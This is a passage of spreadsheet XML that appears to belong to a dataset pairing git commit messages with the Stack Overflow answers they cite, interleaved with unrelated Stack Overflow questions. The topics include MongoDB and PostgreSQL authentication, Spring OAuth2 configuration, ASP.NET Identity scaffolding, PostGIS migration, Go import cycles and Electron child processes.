&lt;code&gt;dataproject.bellabeat_fitness_data.412_512_heart&lt;/code&gt;
SET
Time = (SELECT&lt;br /&gt;
parse_datetime('%m/%d/%Y %r', Time) AS Time1&lt;br /&gt;
FROM&lt;br /&gt;
&lt;code&gt;dataproject.bellabeat_fitness_data.412_512_heart&lt;/code&gt;)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C692</t>
  </si>
  <si>
    <t>authenticate against admin database instead of the default test datab
ase. See https://stackoverflow.com/questions/55135393/exception-authenticating-mongocredential-and-uncategorized-mongo-db-exception</t>
  </si>
  <si>
    <t>As per #46934427, setting spring.data.mongodb.authentication-database=admin would probably fix your issue.
The default database in MongoDB is test, therefore, it's likely you are attempting to authenticate against the test database. Switching to the admin database (the common place for users to be created), might fix your issue.</t>
  </si>
  <si>
    <t xml:space="preserve">We have an existing "legacy" app written in C++/powerbuilder running on Unix with it's own Sybase databases. For complex organizational(existing apps have to go through lot of red-tape to be modified) and code reasons(no re-factoring has been done in yrs so the code is spaghetti), so  it's difficult to get modifications done to this application. Hence I am considering writing a new modern, maybe grails, based web app to do some "admin" type things directly into the database. For example to add users, or to add "constraint rows". 
What does the software community think of this approach of doing a run-around of the existing app like this? Good idea? Tips and hints?
</t>
  </si>
  <si>
    <t>C693</t>
  </si>
  <si>
    <t>Create a new user model for bloom writers
Following this tutorial:
- https://testdriven.io/blog/django-custom-user-model/
These are also worth looking at:
- https://stackoverflow.com/questions/21514354/abstractuser-vs-abstractbaseuser-in-django
- https://www.fomfus.com/articles/how-to-use-email-as-username-for-django-authentication-removing-the-username/</t>
  </si>
  <si>
    <t>The documentation explains this fully. AbstractUser is a full User model, complete with fields, as an abstract class so that you can inherit from it and add your own profile fields and methods. AbstractBaseUser only contains the authentication functionality, but no actual fields: you have to supply them when you subclass.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I recently started my new project with nextjs15 + supabase.
I found out that from nextjs15 fetch function's default behavior is &amp;quot;no cache&amp;quot; which is different from version 14 when &amp;quot;force-cache&amp;quot; was default behavior.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Than I wondered&lt;/strong&gt; how it works in my project. Most of my code uses supabase query function which looks like this.&lt;/p&gt;
&lt;p&gt;(In server component)&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;const supabase = await createClient();
const {data, error} = await supabase.from(&amp;quot;table_name&amp;quot;).select(*);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In this case, is caching is automatically working just like nextjs14 fetch function?
If it is not, then how can i apply caching strategy in this supabase project?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;I tried writing code&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;export const revalidate = 60;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;at the top of my page.tsx file where it fetches data from supabase, but it seems like it doesn't work because whenever I insert new data to my db, the data is shown immediately(before 1 minute pass).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C694</t>
  </si>
  <si>
    <t>scaffold some authentication pages
See https://stackoverflow.com/questions/59818745/ for instructions.</t>
  </si>
  <si>
    <t>The template uses ASP.NET Core Identity for authenticating and storing users is combined with IdentityServer for implementing Open ID Connect.  So that you need to
Scaffold Identity in ASP.NET Core projects
to modify the UI like login , register user ...
If using Visual Studio :
From Solution Explorer, right-click on the
project &gt; Add &gt; New Scaffolded Item
From the left pane of the Add Scaffold dialog, select
Identity &gt; Add
.
Choose Files to override ,For example , login related : Account\Login .
Select your data context class :
ApplicationDbContext
by default .
Click
Add
button.
If using .net core CLI
Create project using template :
dotnet new angular --auth Individual
and build the project .
If you have not previously installed the ASP.NET Core scaffolder, install it in terminal in vs code :
dotnet tool install -g dotnet-aspnet-codegenerator
Add required NuGet package references to the project :
dotnet add package Microsoft.VisualStudio.Web.CodeGeneration.Design
dotnet add package Microsoft.EntityFrameworkCore.SqlServer
You can list the files that can be scaffolded with
dotnet aspnet-codegenerator identity --listFiles
Run the Identity scaffolder with the options you want , use
--files
to scaffold specific files ,use the correct fully qualified name for your DB context:
dotnet aspnet-codegenerator identity -dc ProjectName.Data.ApplicationDbContext --files "Account.Register;Account.Login"
If you run the Identity scaffolder without specifying the
--files
flag or the
--useDefaultUI
flag, all the available Identity UI pages will be created in your project.
Now if you want to modify the login UI , you can modify relevant page in
your project --&gt; Areas--&gt;Identity --&gt;Pages--&gt;Account --&gt;Login.cshtml
page .</t>
  </si>
  <si>
    <t xml:space="preserve">I've been involved in the assessing whether a number of our systems need to be rewritten from the ground up or if they should be partially rewritten, or if they should just continue as is with patches on top.
In order to better assess the situation I was wondering what questions I should be asking myself and others to help determine the appropriate action to take?
</t>
  </si>
  <si>
    <t>C695</t>
  </si>
  <si>
    <t>Decision: Are we using PostGIS in Postgres
We would have to go ahead using PostGIS to support the spacial data types in the legacy oracle database (SDO_GEOMETRY) once we migrate off to Postgres. That again may not be an easy task considering some of the information gathered from internet search.
Some references
https://gis.stackexchange.com/questions/84751/does-ora2pg-support-the-sdo-geometry-spatial-type
https://stackoverflow.com/questions/9789686/migrate-spatial-data-from-oracle-to-postgresql</t>
  </si>
  <si>
    <t>There are two popular options: open source
ogr2ogr
or a commercial offering from
Safe Software
.
Here is how I'd approach the
ogr2ogr
solution.
First, you need to have the right tools:
GDAL/OGR
. If you are on Unix, compile using the right libraries to get Oracle support (not enabled by default). But I'm going to assume you are on Windows. The simplest way to get open source geospatial tools is with
OSGeo4W
. To enable Oracle support for GDAL/OGR, you need to also select the
gdal-oracle10g
package in setup.exe with the "Advanced Install" mode. More info about the Oracle package is at
this page
, and note that you also need to supply the non-free
OCI.DLL
. When working, you should see the driver name appear with
ogr2ogr --formats
.
Your basic command from the OSGeo4W Shell should look something like:
ogr2ogr -f "PostgreSQL" PG:"host=localhost user=someuser dbname=somedb password=password port=5432" OCI:someuser/password layername
Here is more info on GDAL/OGR:
ogr2ogr command usage:
http://www.gdal.org/ogr2ogr.html
Oracle Driver:
http://www.gdal.org/drv_oci.html
PostgreSQL/PostGIS driver:
http://www.gdal.org/drv_pg.html</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to apply blur effect on a line. However, when I apply system backdrop, the blur effect is different. The first picture is without backdrop and second one is when backdrop is applied. The 2nd picture looks like the blur effect is applied but the original line appears on the top.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/f5V1B7l6.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/f5V1B7l6.png" alt="No System Backdrop" /&gt;&lt;/a&gt;
&lt;a href="https://i.sstatic.net/8gVsgKTK.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/8gVsgKTK.png" alt="System Backdrop applied" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Window
    x:Class=&amp;quot;LineBlur2.MainWindow&amp;quot;
    xmlns=&amp;quot;http://schemas.microsoft.com/winfx/2006/xaml/presentation&amp;quot;
    xmlns:x=&amp;quot;http://schemas.microsoft.com/winfx/2006/xaml&amp;quot;
    xmlns:ani=&amp;quot;using:CommunityToolkit.WinUI.Animations&amp;quot;
    xmlns:d=&amp;quot;http://schemas.microsoft.com/expression/blend/2008&amp;quot;
    xmlns:local=&amp;quot;using:LineBlur2&amp;quot;
    xmlns:mc=&amp;quot;http://schemas.openxmlformats.org/markup-compatibility/2006&amp;quot;
    xmlns:media=&amp;quot;using:CommunityToolkit.WinUI.Media&amp;quot;
    Title=&amp;quot;LineBlur2&amp;quot;
    mc:Ignorable=&amp;quot;d&amp;quot;&amp;gt;
&amp;lt;!--Problem with this backdrop effect--&amp;gt;
    &amp;lt;Window.SystemBackdrop&amp;gt;
        &amp;lt;DesktopAcrylicBackdrop /&amp;gt;
    &amp;lt;/Window.SystemBackdrop&amp;gt;
    &amp;lt;Grid x:Name=&amp;quot;mainBorder&amp;quot; Height=&amp;quot;280&amp;quot;&amp;gt;
        &amp;lt;Line
                Opacity=&amp;quot;1&amp;quot;
                Stroke=&amp;quot;Red&amp;quot;
                StrokeThickness=&amp;quot;15&amp;quot;
                X1=&amp;quot;50&amp;quot;
                X2=&amp;quot;150&amp;quot;
                Y1=&amp;quot;90&amp;quot;
                Y2=&amp;quot;90&amp;quot; /&amp;gt;
            &amp;lt;media:UIElementExtensions.VisualFactory&amp;gt;
                &amp;lt;media:PipelineVisualFactory&amp;gt;
                    &amp;lt;media:BlurEffect x:Name=&amp;quot;ImageBlurEffect&amp;quot; IsAnimatable=&amp;quot;True&amp;quot; Amount=&amp;quot;5&amp;quot; /&amp;gt;
                &amp;lt;/media:PipelineVisualFactory&amp;gt;
            &amp;lt;/media:UIElementExtensions.VisualFactory&amp;gt;
    &amp;lt;/Grid&amp;gt;
&amp;lt;/Window&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to apply backdrop and blur effect on some components at the same time. How to make the blur effect normal when backdrop is applied?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C696</t>
  </si>
  <si>
    <t>fix: disable SCRAM authentication
Applications are unable to connect to postgresql-ha and failing with
error "psql: error: FATAL: SCRAM authentication failed". This is an
attempt to fix this problem by disabling SCRAM authentication[1] by
overriding the default conf files[2].
[1] https://stackoverflow.com/questions/62807717/how-can-i-solve-postgresql-scram-authentication-problem</t>
  </si>
  <si>
    <t>Your application uses an API that is linked with the PostgreSQL client C library
libpq
.
The version of that library must be 9.6 or older, and SCRAM authentication was introduced in v10.
Upgrade
libpq
on the application end
and try again.
If you don't need
scram-sha-256
authentication, you can revert to
md5
:
set
password_encryption = md5
in
postgresql.conf
change the authentication method to
md5
in
pg_hba.conf
reload PostgreSQL
change the password of the user to get an MD5 encrypted password</t>
  </si>
  <si>
    <t xml:space="preserve">In the search for resources to become a better developer, I am looking for good examples of how to structure the code in n-tier applications. 
Like... What does the business object do and look, how does it interface with the data access layer etc. How does the UI interface the business layer, and does it interface the DAL directly.
Do you know of great examples freely available, that are worthy of study?
</t>
  </si>
  <si>
    <t>C697</t>
  </si>
  <si>
    <t>Separated out filters for api and ui
As per https://stackoverflow.com/questions/75352996/how-can-i-use-a-third-party-oauth2-provider-to-authenticate-requests-to-my-resou/75361768?noredirect=1#comment132980778_75361768</t>
  </si>
  <si>
    <t>I have managed to achieve what I wanted by doing the following:
Adding a resource server definition to my
spring.security.oauth2
configuration:
spring:
  security:
    oauth2:
      client:
        registration:
          google:
            client-id: ${GOOGLE_CLIENT_ID}
            client-secret: ${GOOGLE_CLIENT_SECRET}
      resourceserver:
        jwt:
          issuer-uri: https://accounts.google.com
          jwk-set-uri: https://www.googleapis.com/oauth2/v3/certs
Adding the
OAuth2ResourceServerConfigurer
and specifying the default
JwtConfigurer
via
.oauth2ResourceServer().jwt()
, and specifying the authorization matches for the path I want to be secured by JWT. I've also split the filter chains, thanks to the comment from
ch4mp
, so that only
/api
endpoint is secured via JWT:
@Bean
@Order(HIGHEST_PRECEDENCE)
fun apiFilterChain(http: HttpSecurity): SecurityFilterChain {
    http.antMatcher("/api/**").authorizeRequests { authorize -&gt;
        authorize.antMatchers("/api/**").authenticated()
    }.exceptionHandling {
        it.authenticationEntryPoint(HttpStatusEntryPoint(HttpStatus.UNAUTHORIZED))
    }
        .csrf().disable()
        .oauth2ResourceServer().jwt()
    return http.build()
}
@Bean
fun uiFilterChain(http: HttpSecurity): SecurityFilterChain {
    http.authorizeRequests { authorize -&gt;
        authorize.antMatchers("/", "/login", "/error", "/webjars/**").permitAll().anyRequest()
            .authenticated()
    }.logout {
        it.logoutSuccessUrl("/").permitAll()
    }.exceptionHandling {
        it.authenticationEntryPoint(HttpStatusEntryPoint(HttpStatus.UNAUTHORIZED))
    }.csrf().csrfTokenRepository(CookieCsrfTokenRepository.withHttpOnlyFalse())
        .and()
        .oauth2Login { oauth2Login -&gt;
            oauth2Login.loginPage("/login")
            oauth2Login.defaultSuccessUrl("/", true)
        }.oauth2Client()
    return http.build()
}
Now, in the method mapped to the path I can do some more specific authentication logic:
@GetMapping("/api/securedByJWT")
fun getResponse(@AuthenticationPrincipal jwt: Jwt): ResponseEntity&lt;String&gt; {
    val email = jwt.claims["email"] as String
    val oauthUser = userRepository.findByUsername(email)
    if(oauthUser == null){
        return ResponseEntity("User not registered.", UNAUTHORIZED)
    }
    return ResponseEntity("Hello world!", HttpStatus.OK)
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an object that has keys I want to access but I am trying to use a string to enter the beginning part of that object&lt;/p&gt;
&lt;p&gt;I then want to continue into that object one more time to get to my &lt;code&gt;refOptions&lt;/code&gt; but I still see those typescript errors&lt;/p&gt;
&lt;p&gt;the code runs well but the problem is that I get the typescript error that either says that a string cant be used on key or that the  &lt;code&gt;refOptions&lt;/code&gt; doesn't exist on type &lt;code&gt;userModel&lt;/code&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import React, { useState } from 'react'
interface userModel {
    planHeaders: string[],
    refOptions: {value: string, label: string, }[],
    sphereOptions: {value: string, lavel: string}[]
}
const tempObject: { users: {user: string, pass: string}[], fee: userModel, fo: userModel, fum: userModel  }  ={
    users:[{user: 'fee', pass: 'feeSecretPass'}, {user: 'fo', pass: 'fo aint small'}, {user: 'fum', pass: 'password'}],
    fee: {
        planHeaders: [ 'Fall prevention', 'Flood Protection', 'Legal Protection' ],
        refOptions: [{ value: 'jerry', label: 'Jerry' }, { value: 'jim', label: 'Jim' }, { value: 'john', label: 'John' }],
        sphereOptions: [{value: 'broker', lavel: 'Broker'},{value: 'coldCall', lavel: 'Cold Call'},{value: 'poster', lavel: 'Poster'},]
    },
    fo: {
        planHeaders: [ 'Fall prevention', 'Flood Protection', 'Legal Protection' ],
        refOptions: [{ value: 'jerry', label: 'Jerry' }, { value: 'jim', label: 'Jim' }, { value: 'john', label: 'John' }],
        sphereOptions: [{value: 'broker', lavel: 'Broker'},{value: 'coldCall', lavel: 'Cold Call'},{value: 'poster', lavel: 'Poster'},]
    },
    fum: {
        planHeaders: [ 'Fall prevention', 'Flood Protection', 'Legal Protection' ],
        refOptions: [{ value: 'jerry', label: 'Jerry' }, { value: 'jim', label: 'Jim' }, { value: 'john', label: 'John' }],
        sphereOptions: [{value: 'broker', lavel: 'Broker'},{value: 'coldCall', lavel: 'Cold Call'},{value: 'poster', lavel: 'Poster'},]
    }
}
const [userSettings, setUserSettings] = useState&amp;lt;{password: string, user: string }&amp;gt;({ password: '', user: '' })
//Element implicitly has an 'any' type because expression of type 'any' can't be used to index type '{ users: { user: string; pass: string; }[]; fee: userModel; fo: userModel; fum: userModel; }'
console.log(`1st Fo Plan Headers are ${tempObject[userSettings.user].planHeaders}`)
//Element implicitly has an 'any' type because expression of type 'string | number | symbol' can't be used to index type '{ users: { user: string; pass: string; }[]; fee: userModel; fo: userModel; fum: userModel; }'.
console.log(`2nd Fo Plan Headers are ${tempObject[userSettings.user as keyof tempObject].planHeaders}`)
//Property 'planHeaders' does not exist on type '{ user: string; pass: string; }[] | userModel'.
console.log(`3rd Fo Plan Headers are ${tempObject[userSettings.user as keyof typeof tempObject].planHeaders}`)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm just confused on how to get this red line gone cause the &lt;code&gt;userSettings&lt;/code&gt; will be different depending on who is using it so it needs to link to the correct people&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C698</t>
  </si>
  <si>
    <t>Add ability to handle authentication errors
This implements a code snippet shared by Rob Napier
(https://stackoverflow.com/a/69065776/764906).</t>
  </si>
  <si>
    <t>The most natural way, IMO is to throw ApiErrors, so that they can be handled in the same way as other errors. That would look like this:
Mark ApiError as an Error type:
extension ApiError: Error {}
Now you can decode Token directly, and it will throw ApiError if there's an API error, or DecodingError if the data is corrupted. (Note the use of
try?
in the first decode and
try
in the
else
decode. This way it throws if the data can't be decoded at all.)
extension Token: Decodable {
    enum CodingKeys: CodingKey {
        case token
    }
    init(from decoder: Decoder) throws {
        if let container = try? decoder.container(keyedBy: CodingKeys.self),
           let token = try? container.decode(String.self, forKey: .token)
        {
            self.init(token: token)
        } else {
            throw try TokenError(from: decoder).error
        }
    }
}
// Usage if you want to handle ApiErrors specially
do {
    try JSONDecoder().decode(Token.self, from: data)
} catch let error as ApiError {
    // Handle ApiErrors
} catch let error {
    // Handle other errors
}
Another approach is to keep ApiErrors separate from other errors, in which case there are three possible ways
requestToken
can return. It can return a Token, or it can return a TokenError, or it can throw a parsing error. Throwing an error is handled by
throws
. Token/TokenError require an "or" type, which is an enum. This could be done with a
Result
, but that might be a little confusing, since the routine also throws. Instead I'll be explicit.
enum TokenRequestResult {
    case token(Token)
    case error(ApiError)
}
Now you can make this Decodable by first trying to decode it as a Token, and if that fails, try decoding it as a TokenError and extracting the ApiError from that:
extension TokenRequestResult: Decodable {
    init(from decoder: Decoder) throws {
        let container = try decoder.singleValueContainer()
        if let token = try?
            container.decode(Token.self) {
            self = .token(token)
        } else {
            self = .error(try container.decode(TokenError.self).error)
        }
    }
}
To use this, you just need to switch:
let result = try JSONDecoder().decode(TokenRequestResult.self, from: token)
switch result {
case .token(let token): // use token
case .error(let error): // use error
}</t>
  </si>
  <si>
    <t xml:space="preserve">The [external-link] seems really cool, but do you think it's still too new to make the commitment to it in an important new project? (Let's assume the project appears to be a good fit for it at first glance.)
It all seems very good, I'm just concerned that the new project I'm working on is using all the newer technologies - WCF, ASP.NET MVC etc - and that if I add one more infant technology I'm going to end up with lots of problems and not enough technical skill or community support to figure them out...
It's just so hard to resist that demanding boy inside me: I wanna have the newest stuff!
(Disclaimer: I'm very new to the S#arp Architecture, so I'm mostly basing my optimistic opinion of it on the stated goals of the project, articles, bits of sample code etc.)
</t>
  </si>
  <si>
    <t>C699</t>
  </si>
  <si>
    <t>Eureka Server doesn't discover multiple instances of the same client issue.
Stackoverflow link: https://stackoverflow.com/questions/76754399/eureka-server-doesnt-discover-multiple-instances-of-the-same-client</t>
  </si>
  <si>
    <t>I think it does not recognise random port, instead we can run the application instances deliberately on differents ports by "adding VM options".
Go to "Edit configuration settings" of the application.
Click on "Modify Options" and then select "Add VM Options"
Enter the command "-Dserver.port= portnumber" eg - -Dserver.port=9091.
Click on run and then refresh eureka server.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm having an issue trying to get the uri lookup plugin working in fact that I set from a dictionary.&lt;/p&gt;
&lt;p&gt;I need to use the Oracle Fusion API by looking up the ID for the Role and Users that need assigning to the role. I thought a dynamic dict using uri lookup would be a good idea, but I haven't been able to get it working.&lt;/p&gt;
&lt;p&gt;Essentially, for each Role (Key) the lookup plugin will get the ID. And for each Username (Values), I would also like to lookup the ID.&lt;/p&gt;
&lt;p&gt;Dictionary:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;fusion_roles_for_users:
  ORA_ASM_APPLICATION_IMPLEMENTATION_CONSULTANT_JOB:
    - Automation_Test
    - Automation_Test2
  ORA_FND_IT_SECURITY_MANAGER_JOB:
    - Automation_Test
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Task:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;- name: Build Payload
  ansible.builtin.set_fact:
    roles_to_assign: &amp;quot;{{
      roles_to_assign | default([])
      + [{
          'role': role_id_query,
          'members': [prefix] | product(item.value) | map('join') | list | product([suffix]) | map('join') | list
        }]
    }}&amp;quot;
  loop: &amp;quot;{{ fusion_roles_for_users | dict2items }}&amp;quot;
  vars:
    role_id_uri: &amp;quot;{{ lookup('ansible.builtin.url', 'https://&amp;lt;oracle-url&amp;gt;.oraclecloud.com/hcmRestApi/scim/Roles?filter=name%20eq%20%22{{ item.key }}%22', headers=headers, split_lines=false) }}&amp;quot;
    role_id_query: &amp;quot;{{ role_id_uri | json_query('Resources[0].id') }}&amp;quot;
    prefix: !unsafe &amp;quot;{{ lookup('ansible.builtin.url', 'https://&amp;lt;oracle-url&amp;gt;.oraclecloud.com/hcmRestApi/scim/Users?filter=username%20eq%20%22&amp;quot;
    suffix: !unsafe &amp;quot;%22', headers=headers, split_lines=false) }}&amp;quot;
    headers:
      Authorization: Basic {{ encoded_rest_api_bearer }}
      Content-Type: application/json
- debug: var=roles_to_assign
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Result&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ok: [localhost] =&amp;gt; {
    &amp;quot;roles_to_assign&amp;quot;: [
        {
            &amp;quot;members&amp;quot;: [
                &amp;quot;{{ lookup('ansible.builtin.url', 'https://&amp;lt;oracle-url&amp;gt;.oraclecloud.com/hcmRestApi/scim/Users?filter=username%20eq%20%22Automation_Test%22', headers=headers, split_lines=false) }}&amp;quot;,
                &amp;quot;{{ lookup('ansible.builtin.url', 'https://&amp;lt;oracle-url&amp;gt;.oraclecloud.com/hcmRestApi/scim/Users?filter=username%20eq%20%22Automation_Test2%22', headers=headers, split_lines=false) }}&amp;quot;
            ],
            &amp;quot;role&amp;quot;: &amp;quot;705A91417EDF41718059A52527453C7D&amp;quot;
        },
        {
            &amp;quot;members&amp;quot;: [
                &amp;quot;{{ lookup('ansible.builtin.url', 'https://&amp;lt;oracle-url&amp;gt;.oraclecloud.com/hcmRestApi/scim/Users?filter=username%20eq%20%22Automation_Test%22', headers=headers, split_lines=false) }}&amp;quot;
            ],
            &amp;quot;role&amp;quot;: &amp;quot;72F1E3209CFF4F5FA92003F9632322D2&amp;quot;
        }
    ]
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As you can see the &amp;quot;role&amp;quot; lookup works. But members I am trying to build the lookup, and all it does it output it as string without doing the lookup.&lt;/p&gt;
&lt;p&gt;Any advise of how to use lookup for each value?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C7</t>
  </si>
  <si>
    <t>Arch Change to avoid import cycles
* An import cycle indicates a fundamentally faulty design. Broadly
  speaking, you're looking at one of the following:
  You're mixing concerns. Perhaps view shouldn't be accessing
  action.Register at all, or perhaps action shouldn't be responsible for
  changing the names of views (or both). This seems the most likely.
  You're relying on a concretion where you should be relying on an
  interface and injecting a concretion. For example, rather than the
  view accessing action.Register directly, it could call a method on an
  interface type defined within view, and injected into the View object
  when it is constructed.
  You need one or more additional, separate packages to hold the logic
  used by both the view and action packages, but which calls out to
  neither.
  Generally speaking, you want to architect an application so that you
  have three basic types of packages:
  Wholly self-contained packages, which reference no other first-party
  packages (they can of course reference the standard library or other
  third-party packages).
  Logic packages whose only internal dependencies are of type 1 above,
  i.e., wholly self-contained packages. These packages should not rely
  on each other or on those of type 3 below.
  "Wiring" packages, which mostly interact with the logic packages, and
  handle instantiation, initialization, configuration, and injection of
  dependencies. These can depend on any other package except for other
  type 3 packages. You should need very, very few packages of this type
  - often just one, main, but occasionally two or three for more complex
    applications.
    https://stackoverflow.com/questions/50986022/fixing-import-cycle-in-go</t>
  </si>
  <si>
    <t>An import cycle indicates a fundamentally faulty design. Broadly speaking, you're looking at one of the following: You're mixing concerns. Perhaps view
shouldn't be accessing action.Register at all, or perhaps action
shouldn't be responsible for changing the names of views (or both). This seems the most likely. You're relying on a concretion where you should be relying on an interface and injecting a concretion. For example, rather than the view accessing
action.Register directly, it could call a method on an interface type defined within view , and injected into the View object when it is constructed.
You need one or more additional, separate packages to hold the logic used by both the view and action
packages, but which calls out to neither.
Generally speaking, you want to architect an application so that you have three basic types of packages:
Wholly self-contained packages, which reference no other first-party packages (they can of course reference the standard library or other third-party packages).
Logic packages whose only internal dependencies are of type 1 above, i.e., wholly self-contained packages. These packages should not rely on each other or on those of type 3 below.
"Wiring" packages, which mostly interact with the logic packages, and handle instantiation, initialization, configuration, and injection of dependencies. These can depend on any other package except for other type 3 packages. You should need very, very few packages of this type - often just one,
main
, but occasionally two or three for more complex applications.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let's say I have a selector like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const selectItemByGuid = (state, guid) =&amp;gt; {
    return state.items.find(i =&amp;gt; i.guid == guid)
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now, I want to apply that selector to each guid in a list of guids.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;export const selectSpecialItems = createSelector(
    [selectSpecialEntityGuids],
    guids =&amp;gt; {
        const items = guids.map(guid =&amp;gt; selectItemByGuid(state, guid)) // Where do I get state here?
        return items || []       
    },
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How would I pass in &lt;code&gt;state&lt;/code&gt; to the inner selector?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C70</t>
  </si>
  <si>
    <t>Add SharedPreferencesUtils.kt
Add ResourcesResolver.kt
Replace ViewModel's context with resourcesResolver
Add new way to use interface @ unite test instead of create fake interface(https://stackoverflow.com/a/62312473)
Update dagger,coroutines, and mockito dependencies</t>
  </si>
  <si>
    <t>In this case is very hard to unit test yours class because it depends not only on context, but also on Bitmap, BitmapFactory and Canvas.
Maybe will be better if you separate business and drawing logic at different classes. For example yours Cloud object will contain only pure business logic and you could easily test it. On the other hand you could create CloudDrawer class that will contain drawing logic with Canvas/Context/Bitmap
In most simper cases you could replace Context by using special interface. For example we use getString() in our classes. But we want to test these classes. And in this case we use this abstraction over Context:
interface ResourceManager {
    fun getColor(@ColorRes resId: Int): Int
    fun getDrawable(@DrawableRes resId: Int): Drawable?
    fun getString(@StringRes resId: Int): String
    fun getString(@StringRes resId: Int, vararg formatArgs: Any): String
    fun getStringArray(@ArrayRes resId: Int): Array&lt;String&gt;
    fun getQuantityString(@PluralsRes resId: Int, quantity: Int, formatArgs: Int): String
}
And it's easy to mock this interface:
 val resource = mock(ResourceManager::class.java)
 `when`(resource.getString(any(Int::class.java))).thenReturn("text")</t>
  </si>
  <si>
    <t xml:space="preserve">Does anyone know of any good tutorials on ADO.NET Entity Framework?
There are a few useful links here at [external-link], and I've found one tutorial at [external-link], but can anyone recommend any other good tutorials? 
Any tutorials available from Microsoft, either online or as part of any conference/course material?
</t>
  </si>
  <si>
    <t>C700</t>
  </si>
  <si>
    <t>Fix Attempt #2 (User Not Persisting After Page Refresh)
- deleted cookie-sessions package
- installed connect-mongo package and configured it accordinlgy
- found solution thanks to this: https://stackoverflow.com/questions/29721225/staying-authenticated-after-the-page-is-refreshed-using-passportjs
- and also the brief connect-mongo documentation in the npm website</t>
  </si>
  <si>
    <t>The solution is to store the sessions in the
DB
. I used
connect-mongo
.
app.js:
var mongoose = require('mongoose');
var expressSession = require('express-session');
var MongoStore = require('connect-mongo')(expressSession);
mongoose.connect(db_url, function (err) {
    if (err) {
        console.log(err);
    }
});
app.use(expressSession({
    secret: process.env.SESSION_SECRET || 'keyboard cat',
    resave: false,
    saveUninitialized: false,
    store: new MongoStore({ mongooseConnection: mongoose.connection })
}));
after this,
req.isAuthenticated()
returns
true
on every request even after refreshing the page. (Thanks to
app.use(passport.session())
which comes before any route handler)
app.use('/', function (req, res, next) {
    if (req.isAuthenticated()) {
        // returns true if a user already logged in.
    }
    next();
});</t>
  </si>
  <si>
    <t xml:space="preserve">I have two servers, one in a seperate domain and the other on the primary domain, that need to pass web service calls back and forth to each other. For security and various other reasons, I don't want these machines to talk directly to each other. 
I would like to have a server that sits between them to route these web service requests through to the other server.
I started writing a .net web service application that mirrors the signatures of every possible web service call, but this doesn't seem very practical, and will need to be updated whenever a signature changes.
The built in IIS forwarding doesn't seem to do what I want as it just redirects the calls to the other machine, which isn't what I want.
These web services are passing serialized .net objects as input/output parameters.
Do I have any options for just generically forwarding a web service call to another server?
-EDIT-
To answer some of the questions regarding the need for this:
I mis-spoke when I said it was a DMZ, I should have said it was just a separate domain. I updated the question with this.
The "various other reasons" I mentioned above for this architecture is because I'm dealing with a child company that accesses small parts of our network via secured VPN. This child company has no direct access at all to the sub domain. However, they do need to access the web services on a server in the sub domain. They way I was getting around this was to have a server that can communicate to their server, as well as to our server in the sub domain.
</t>
  </si>
  <si>
    <t>C701</t>
  </si>
  <si>
    <t>fix some JNI caching issues, mostly for JUCE app sample.
Namely, jclass cannot be cached because the Java object can be GC-ed.
https://stackoverflow.com/questions/2093112/why-i-should-not-reuse-a-jclass-and-or-jmethodid-in-jni
There is some issue regarding classloaders for JUCE app, which I assume is
related to multidex. (to be resolved)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm beginer of electron, and I learned I can execute external program with spawn function.
But, when I execute external program, I can't see output data of the program immediately.&lt;/p&gt;
&lt;p&gt;This is my external python program.
You can see it's a simple program printing &amp;quot;Tick&amp;quot; and saving it to the file.
And it works fine, when I execute it manually. I can see the &amp;quot;Tick&amp;quot; every each second.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import time
while True:
    with open(&amp;quot;tick.txt&amp;quot;, &amp;quot;a&amp;quot;) as f:
        f.write(&amp;quot;Tack&amp;quot;)
        f.close()
    print(&amp;quot;Tick&amp;quot;)
    time.sleep(1)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But, when I execute it by electron spawn() with following code,
I can not see &amp;quot;Tick&amp;quot; on the VS-Code terminal.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function ExecuteTick()
{
    try {
        console.log(&amp;quot;Executing Tick&amp;quot;);
        const child_process = spawn(
            &amp;quot;python&amp;quot;,
            [
                &amp;quot;../converter/tick.py&amp;quot;
            ]);
        child_process.stdout.on('data', (data) =&amp;gt; {
            console.log(data.toString());
        });
        child_process.stderr.on('data', (data) =&amp;gt; {
            console.error(&amp;quot;Tick-Error: &amp;quot; + data);
        });
        child_process.on('close', (code) =&amp;gt; {
            console.log(&amp;quot;Tick-End: &amp;quot; + code);
        });
    }catch(err){
